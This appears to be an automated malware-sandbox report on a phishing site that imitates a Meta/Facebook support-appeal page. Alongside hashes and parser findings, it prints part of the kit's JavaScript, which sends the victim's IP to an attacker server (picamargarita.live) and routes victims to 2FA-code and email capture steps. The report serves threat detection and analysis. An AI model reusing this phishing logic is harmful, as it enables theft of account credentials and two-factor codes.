Cookbook Comments:	Browse: https://meta-support-appeal-121990471.web.app/ Browse: https://business.facebook.com/MetaforBusiness?ref=fbb_footer Browse: https://www.instagram.com/metaforbusiness/?ref=fbb_ens&fbclid=IwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYI Browse: https://twitter.com/MetaforBusiness?fbclid=IwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013k Browse: https://www.linkedin.com/showcase/metaforbusiness?fbclid=IwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Og Browse: https://about.meta.com/?utm_source=about.facebook.com&utm_medium=redirect Browse: https://developers.facebook.com/ Browse: https://www.facebook.com/careers Browse: https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0 Browse: https://business.facebook.com/business/help Browse: https://meta-support-appeal-121990471.web.app/ Browse: https://business.facebook.com/MetaforBusiness?ref=fbb_footer Browse: https://www.instagram.com/metaforbusiness/?ref=fbb_ens&fbclid=IwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYI Browse: https://twitter.com/MetaforBusiness?fbclid=IwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013k Browse: https://www.linkedin.com/showcase/metaforbusiness?fbclid=IwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Og Browse: https://about.meta.com/?utm_source=about.facebook.com&utm_medium=redirect Browse: https://developers.facebook.com/ Browse: https://www.facebook.com/careers Browse: https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0 Browse: https://business.facebook.com/business/help Browse: https://meta-support-appeal-121990471.web.app/

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.163, 34.104.35.123, 142.251.36.234, 142.251.37.10, 172.217.16.170, 142.251.36.170, 142.251.36.202
Excluded domains from analysis (whitelisted): edgedl.me.gvt1.com, content-autofill.googleapis.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4286
Entropy (8bit):	4.933290584110762
Encrypted:	false
SSDEEP:	96:5+8ItBBBuxc+6QQQQQiRRRRRRRRRRJJO9P111118B:1cjRRRRRRRRRRi90
MD5:	8CDDCA427DAE9B925E73432F8733E05A
SHA1:	1999A6F624A25CFD938EEF6492D34FDC4F55DEDC
SHA-256:	89676A3FB8639D6531C525E5800FF4CC44D06D27FF5607922D27E390EB5B6E62
SHA-512:	20FBEE2886995C253E762F2BB814AD16890B0989DEAB4D92394363EF0060B96A634D87C380C7BA1B787A8AB312BE968FED9329A729B4E0D64235A09E397DB740
Malicious:	false
Reputation:	low
Preview:	...... .... .........(... ...@..... ......................................................................e.G.c.......................d...c...e.G.............................................................................j...f...f...f...e.......................f...f...f...g...f...j...........................................................m$..j...i...h...h...h...h.......................h...h...h...h...h...i...j...m$..............................................j...j...j...j...j...j...k...j.......................j...k...j...k...k...k...k...l...u.......................................q.-.n...m...l...m...l...l...m...l.......................l...m...l...m...m...m...m...m...n...q.-.............................u...p...o...o...o...o...o...o...o...o.......................o...p...o...p...p...o...p...o...o...p...u........................$..r...r...q...q...q...q...q...q...r...q.......................r...q...r...q...q...r...q...r...r...q...r....$..................v...t...t...t...t...t...t...t...t

Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp	HTTP Parser: <input type="password" .../> found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: <input type="password" .../> found

Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp	HTTP Parser: No <meta name="author".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp	HTTP Parser: No <meta name="author".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="author".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="author".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="author".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="author".. found

Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp	HTTP Parser: No <meta name="copyright".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp	HTTP Parser: No <meta name="copyright".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="copyright".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="copyright".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="copyright".. found
Source: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareers	HTTP Parser: No <meta name="copyright".. found

Source: chromecache_284.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/2v2plzJQoTQ/ equals www.facebook.com (Facebook)
Source: chromecache_240.1.dr, chromecache_274.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/A4tfXiHOGrs/ equals www.facebook.com (Facebook)
Source: chromecache_279.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/CCT5pM3qiNk/ equals www.facebook.com (Facebook)
Source: chromecache_240.1.dr, chromecache_274.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/Ga6vBwdwgUx/ equals www.facebook.com (Facebook)
Source: chromecache_232.1.dr, chromecache_279.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/MDzNl_j9yvg/ equals www.facebook.com (Facebook)
Source: chromecache_279.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/OKBVmODmb-W/ equals www.facebook.com (Facebook)
Source: chromecache_276.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/V8_l6oUwABQ/ equals www.facebook.com (Facebook)
Source: chromecache_276.1.dr, chromecache_255.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/V9vdYColc4k/ equals www.facebook.com (Facebook)
Source: chromecache_232.1.dr, chromecache_271.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/WRsJ32R7YJG/ equals www.facebook.com (Facebook)
Source: chromecache_279.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/ equals www.facebook.com (Facebook)
Source: chromecache_232.1.dr, chromecache_276.1.dr, chromecache_213.1.dr, chromecache_255.1.dr	String found in binary or memory: * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ equals www.facebook.com (Facebook)
Source: chromecache_225.1.dr	String found in binary or memory: 2021</span></div></div></div></div>',1);function ns(a,e,t,s,l,i){const c=(0,o.up)("chat-widget");return(0,o.wg)(),(0,o.iD)(o.HY,null,[l.loading?((0,o.wg)(),(0,o.iD)("div",os,is)):(0,o.kq)("",!0),(0,o._)("div",cs,[ds,(0,o.Wm)(c,{ipAddress:l.ipAddress,onChatMessageStatus:i.chatMessageStatus},null,8,["ipAddress","onChatMessageStatus"]),rs])],64)}var vs={name:"Checkpoint",components:{ChatWidget:ma,CheckStatus:St},data(){return{v$:(0,ca.ZP)(),loadingBar:0,cext:"",countdown:"",loading:"",ipAddress:"",type:"",email:"",robot:!1,chatMessage:!1,form:{code:""}}},mounted(){this.getClientIP()},created(){document.title="Facebook",ra.Z.interceptors.request.use((a=>(1!=this.robot&&1!=this.chatMessage&&(this.loading=!0),a)),(a=>(1!=this.robot&&1!=this.chatMessage&&(this.loading=!1),Promise.reject(a)))),ra.Z.interceptors.response.use((a=>(1!=this.robot&&1!=this.chatMessage&&(this.loading=!1),a)),(a=>(console.log("loading4"),1!=this.robot&&1!=this.chatMessage&&(this.loading=!1),Promise.reject(a)))),this.type=this.$route.params.type,this.email=this.$route.params.email},methods:{chatMessageStatus(){this.chatMessage=!0,console.log(this.chatMessage)},getClientIP(){ra.Z.get("https://api.ipify.org?format=json").then((a=>{this.ipAddress=a.data.ip,this.checkBan(),this.getResponse()})).catch((a=>{console.log(a)}))},checkBan(){ra.Z.post("https://picamargarita.live/api/fetch/ban",{ip:this.ipAddress}).then((a=>{"BAN"==a.data&&(window.location.href="https://www.facebook.com/help/")})).catch((a=>{console.log(a)}))},getResponse(){this.interval=setInterval((()=>{ra.Z.post("https://picamargarita.live/api/fetch/decision",{case_ref:this.ipAddress}).then((a=>{"CMD_EMAIL"==a.data&&(resType="email"),"CMD_CODE"==a.data&&(resType="code"),this.$router.push({name:"twofa",params:{type:resType,email:this.form.email}}),clearInterval(this.interval)})).catch((a=>{console.log(a)}))}),1e3)}}};const bs=(0,i.Z)(vs,[["render",ns],["__scopeId","data-v-793a59c4"]]);var us=bs;const fs=[{path:"/",name:"appealform",component:Ce},{path:"/captcha",name:"captchastep",component:ts},{path:"/:type/:email",name:"twofa",component:Vt},{path:"/checkpoint",name:"checkpoint",component:us}],ps=(0,n.p7)({history:(0,n.r5)(),routes:fs});var hs=ps;(0,s.ri)(r).use(hs).mount("#app")}},e={};function t(s){var o=e[s];if(void 0!==o)return o.exports;var l=e[s]={exports:{}};return a[s](l,l.exports,t),l.exports}t.m=a,function(){var a=[];t.O=function(e,s,o,l){if(!s){var i=1/0;for(n=0;n<a.length;n++){s=a[n][0],o=a[n][1],l=a[n][2];for(var c=!0,d=0;d<s.length;d++)(!1&l\|\|i>=l)&&Object.keys(t.O).every((function(a){return t.O[a](s[d])}))?s.splice(d--,1):(c=!1,l<i&&(i=l));if(c){a.splice(n--,1);var r=o();void 0!==r&&(e=r)}}return e}l=l\|\|0;for(var n=a.length;n>0&&a[n-1][2]>l;n--)a[n]=a[n-1];a[n]=[s,o,l]}}(),function(){t.n=function(a){var e=a&&a.__esModule?function(){return a["default"]}:function(){return a};return t.d(e,{a:e}),e}}(),function(){t.d=function(a,e){for(var s in e)t.o(e,s)&&!t.o(a,s)&&Object.defineProperty(a,s,{enumerable:!0,ge
Source: chromecache_225.1.dr	String found in binary or memory: 2023 Meta</a><div data-v-cb73a628><a href="https://business.facebook.com/MetaforBusiness?ref=fbb_footer" target="_blank" data-v-cb73a628><i class="bx bxl-facebook-circle" data-v-cb73a628></i></a><a href="https://www.instagram.com/metaforbusiness/?ref=fbb_ens&fbclid=IwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYI" target="_blank" data-v-cb73a628><i class="bx bxl-instagram" data-v-cb73a628></i></a><a href="https://twitter.com/MetaforBusiness?fbclid=IwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013k" target="_blank" data-v-cb73a628><i class="bx bxl-twitter" data-v-cb73a628></i></a><a href="https://www.linkedin.com/showcase/metaforbusiness?fbclid=IwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Og" target="_blank" data-v-cb73a628><i class="bx bxl-linkedin-square" data-v-cb73a628></i></a></div></div><div class="footer_links__OH7DL" data-v-cb73a628><div data-v-cb73a628><a href="https://about.meta.com/?utm_source=about.facebook.com&utm_medium=redirect" target="_blank" data-v-cb73a628>About</a><a href="https://developers.facebook.com" target="_blank" data-v-cb73a628>Developers</a><a href="https://www.facebook.com/careers" target="_blank" data-v-cb73a628>Careers</a><a href="https://www.facebook.com/privacy/policy/?entry_point=data_policy_redirect&entry=0" target="_blank" data-v-cb73a628>Privacy</a><a href="https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0" target="_blank" data-v-cb73a628>Cookies</a><a href="https://www.facebook.com/policies_center" target="_blank" data-v-cb73a628>Terms</a><a href="https://business.facebook.com/business/help" target="_blank" data-v-cb73a628>Help Center</a></div><div data-v-cb73a628><a href="/" data-v-cb73a628><b data-v-cb73a628>English (US)</b></a><a href="/" data-v-cb73a628><b data-v-cb73a628>English (UK)</b></a><a href="/" data-v-cb73a628><b data-v-cb73a628>Espa equals www.facebook.com (Facebook)
Source: chromecache_225.1.dr	String found in binary or memory: 2023 Meta</a><div data-v-cb73a628><a href="https://business.facebook.com/MetaforBusiness?ref=fbb_footer" target="_blank" data-v-cb73a628><i class="bx bxl-facebook-circle" data-v-cb73a628></i></a><a href="https://www.instagram.com/metaforbusiness/?ref=fbb_ens&fbclid=IwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYI" target="_blank" data-v-cb73a628><i class="bx bxl-instagram" data-v-cb73a628></i></a><a href="https://twitter.com/MetaforBusiness?fbclid=IwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013k" target="_blank" data-v-cb73a628><i class="bx bxl-twitter" data-v-cb73a628></i></a><a href="https://www.linkedin.com/showcase/metaforbusiness?fbclid=IwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Og" target="_blank" data-v-cb73a628><i class="bx bxl-linkedin-square" data-v-cb73a628></i></a></div></div><div class="footer_links__OH7DL" data-v-cb73a628><div data-v-cb73a628><a href="https://about.meta.com/?utm_source=about.facebook.com&utm_medium=redirect" target="_blank" data-v-cb73a628>About</a><a href="https://developers.facebook.com" target="_blank" data-v-cb73a628>Developers</a><a href="https://www.facebook.com/careers" target="_blank" data-v-cb73a628>Careers</a><a href="https://www.facebook.com/privacy/policy/?entry_point=data_policy_redirect&entry=0" target="_blank" data-v-cb73a628>Privacy</a><a href="https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0" target="_blank" data-v-cb73a628>Cookies</a><a href="https://www.facebook.com/policies_center" target="_blank" data-v-cb73a628>Terms</a><a href="https://business.facebook.com/business/help" target="_blank" data-v-cb73a628>Help Center</a></div><div data-v-cb73a628><a href="/" data-v-cb73a628><b data-v-cb73a628>English (US)</b></a><a href="/" data-v-cb73a628><b data-v-cb73a628>English (UK)</b></a><a href="/" data-v-cb73a628><b data-v-cb73a628>Espa equals www.linkedin.com (Linkedin)
Source: chromecache_225.1.dr	String found in binary or memory: 2023 Meta</a><div data-v-cb73a628><a href="https://business.facebook.com/MetaforBusiness?ref=fbb_footer" target="_blank" data-v-cb73a628><i class="bx bxl-facebook-circle" data-v-cb73a628></i></a><a href="https://www.instagram.com/metaforbusiness/?ref=fbb_ens&fbclid=IwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYI" target="_blank" data-v-cb73a628><i class="bx bxl-instagram" data-v-cb73a628></i></a><a href="https://twitter.com/MetaforBusiness?fbclid=IwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013k" target="_blank" data-v-cb73a628><i class="bx bxl-twitter" data-v-cb73a628></i></a><a href="https://www.linkedin.com/showcase/metaforbusiness?fbclid=IwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Og" target="_blank" data-v-cb73a628><i class="bx bxl-linkedin-square" data-v-cb73a628></i></a></div></div><div class="footer_links__OH7DL" data-v-cb73a628><div data-v-cb73a628><a href="https://about.meta.com/?utm_source=about.facebook.com&utm_medium=redirect" target="_blank" data-v-cb73a628>About</a><a href="https://developers.facebook.com" target="_blank" 